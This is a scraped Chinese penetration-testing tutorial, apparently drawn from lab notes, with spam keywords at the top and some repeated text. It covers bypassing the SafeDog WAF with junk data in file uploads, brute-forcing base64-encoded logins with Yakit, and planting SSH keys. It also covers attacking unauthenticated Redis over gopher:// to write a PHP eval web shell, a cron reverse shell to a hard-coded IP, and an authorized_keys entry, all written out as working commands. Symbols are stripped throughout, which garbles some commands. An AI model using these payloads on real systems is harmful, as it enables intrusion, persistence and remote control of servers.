网站加速器推荐,家乡网站怎么做,阜新网站制作,公司网站建设方案所需素材WAF安全狗
脏数据适用于所有漏洞绕过waf#xff0c;但是前提条件垃圾信息必须放在危险信息前#xff0c;是不能打断原有数据包的结构#xff0c;不能影响后端对数据包的解析。
以DVWA靶场文件上传为例
新建php文件 上传文件被安全狗拦截 使用bp抓包查看 在数据包Content-…WAF安全狗
脏数据适用于所有漏洞绕过waf但是前提条件垃圾信息必须放在危险信息前是不能打断原有数据包的结构不能影响后端对数据包的解析。
以DVWA靶场文件上传为例
新建php文件 上传文件被安全狗拦截 使用bp抓包查看 在数据包Content-Disposition字段中的form-data后添加分号在分号后添加脏数据如果不加分号添加脏数据可能会打乱原有数据包的结构。文件上传成功。 YAKIT
暴力破解
账户密码明文传输
客户防护base64编码加密。
前端base64编码加密后端base64编码解密
抓包抓到的是编码以后的数据包进行账密爆破时密码字典也需要进行编码才能进行爆破。
新建x.php文档
?php $abase64_decode($_GET[passwd]);if($aadmin){echo welcom;
}else{echo error;
}?端口设置
点击MITM 更改浏览器代理 使用yt代理访问x.php页面 在历史中右击数据包选择WEB FUZZER 选择admin右键插入模糊字典标签选择user top10。 响应结果一致是因为后端做了base64解码字典中内容是铭文的被编码后后端不认识要在使用的字典前添加base64编码。 {{base64({{x(user_top10)}})}}爆破出密码为admin 之后使用抓包查看数据包时如果流量内容是base64编码的就使用yakit爆破。yakit中也有dnslog在测试响应的时候可以使用yakit自带的dnslog进行测试。 SSH免密登录
Linux服务器一定开放ssh端口。
ssh采用非对称加密存在公钥私钥
将自己的公钥写入受害者的ssh目录中的时候登录受害者ssh就可以不使用密码。
以kali主机为失陷主机为例
首先开启ssh服务
ss -antpl
systemctl start ssh.service
ss -antpl
pwd #家目录的路径登录kali主机的用户家目录下有.ssh目录其中有已通过认证的ssh密钥我们的公钥就可以写入.ssh目录中。
注意在没有登陆过ssh的时候需要触发以下的登录才会出现.ssh目录。
ssh kali127.0.0.1进入.ssh目录看到里面的已通过认证的主机的公钥
模拟命令执行写入公钥
在windows中安装Git安装完成后Windows就可以使用ssh客户端。
写入公钥可以通过一句话木马或代码执行或redis写入公钥
找到用户目录在目录中右击看到有一个Git Bash Here点击进入命令执行界面
ssh-keygen -t rsa执行成功后出现.ssh目录 进入.ssh目录可以看到有两个文件id_rsa.pub就是公钥。 查看公钥内容 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcFgp7y4ZigaHArZlRjLHJhhBbFf1Q3HeuLly5HoUoSaXUUF6V7/dT57XQqJgqAnnAjc3LOvm9CzGAokKYR51Tony46RrpxSG8PlGpQhGsiU0JI9VWuPXMzzPFaK/1gfsctGIaihNh3Fosx7VKcqLn5sBRl6FjqfqUtcbYAjHNkAnvb5bGBsb/9XpUAvk1t3aHjvAz9oiGSl6L4PRi7E2mcramR4QnkWd/63KzaI38rsgnYbzFSiDfN0VxsKmS0jvjw92sBL1N9WaMyouNQWHTkdZKNSgWpakUayLpIcGx4vepaCNh/WV07mVh39L6FnOt7bkCVEmyLoWaMzVRc3x6prDoWFnuRwB2CyRctwD4tX6AZ0QODOYFyraP1MDYcaDFm1rPhvNwX0XhqjfiZshQDU4iq1veVDBjHcmpsJOQ8YoiCRfLgQ0c31oCCXFHbpcF65LQxPsIbISryjp4tZolgmtNFvsE/cLzz87gcIS7cUnOSirGu33ok zsDESKTOP-6DBQCEP在.ssh目录中输入
vim authorized_keys将公钥复制进去 在Windows中的Git命令行中输入
ssh root192.168.16.132redis未授权写公钥
redis未授权 高性能Redis 是基于内存存储的非关系型数据库具有读写速度快可以处理大量数据的特点因此被企业广泛使用。简单易用Redis 的 API 简单易用支持多种数据结构的存储如字符串、哈希、列表、集合和有序集合等。此外Redis 还提供了丰富的操作命令可快速实现各种数据操作。分布式缓存Redis 的分布式缓存功能可以帮助企业快速构建高可用、高性能、高可扩展的缓存集群在提高数据读写性能的同时还可以实现数据的分片存储和负载均衡。持久化存储Redis 支持持久化存储功能可以将内存中的数据通过快照或日志记录的方式持久化到磁盘中保证数据的安全性和可靠性。
安装redis
kali换源
vim /etc/apt/sources.list
#阿里云源
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ kali-rolling main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ kali-rolling main contrib non-free#更新索引文件
apt-get update#更新软件包
apt-get upgrade#安装redis
apt-get install redis-server
#启动
/usr/bin/redis-server
Gopher协议
支持发出GET、POST请求
gopher 协议可以在特定的端口上进行相关命令的执行
gopher://IP:port/_{TCP/IP data stream}
利用redis写文件 redis-cli -h [ip]
这条命令是用来连接到 Redis 数据库的命令行界面CLI。其中的-h [ip]参数用于指定要连接的 Redis 服务器的 IP 地址。通过运行这个命令你可以在命令行中与 Redis 数据库进行交互执行各种操作如设置键值对、获取值、删除键等。
写shell
aaaset 1 ?php eval($_POST[1]); ?
config set dir /var/www/html/
config set dbfilename shell.php
savebbburl编码
curl -v gopher://127.0.0.1:6379/_set%201%20%22%3C%3Fphp%20eval(%24_POST%5B1%5D)%3B%20%3F%3E%22%20%0Aconfig%20set%20dir%20%2Fvar%2Fwww%2Fhtml%2F%20%0Aconfig%20set%20dbfilename%20shell.php%20%0Asave%0A反弹shell
set 1 \n\n\n\n* * * * * root bash -i /dev/tcp/192.168.242.134/2333 01\n\n\n\n
config set dir /etc
config set dbfilename crontab
saveredis写入ssh公钥config set dir /root/.ssh/
config set dbfilename authorized_keys
set margin ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDbC05xE4PBAEOdBbF4F6Eai//NjL6fAkWSyotaz7Xoc33QfbzxNXz/3iDvfQTD4PIjznc179C1TcjV4dyrYdaC0w2JxnsRmiECrfNlRVkkkx6l/jFV0WH5P7ziYATMtVRkuhCm3wbqG0q8w8UyW5FeqB2N17rHrwxGctDmuPGNbObbvGSvGVe5S73Uw1WwI08n3oqTjoi2dSu/FuDwVyzCbQXqQfr/5832tchX2jYl1KzDSCRENoacj8RiIxUOEwvzJRFeMQW5qlG6FWfdksKzXwSSJ2TmAOzcHPU4ymimH49SRpOihr5i2N/j9Ts7AdhFepFu7Jkpa/YlwvSu2nDprUaZC93wBOP9Typma56xyhb8ieOEU1QbOWrtVcqc2ouUmwRO06tv2VqKERRRaGilgarhOOO7kigeVm7t9HUancnP210WqeYwGbSck6nZmbYHVoGThLcavYyt8Ue1MZPeQhzEqWPlJeHwrddsQYa2F6XJ/UG6VUx2qUjE xiuxiu-PC
save
quit
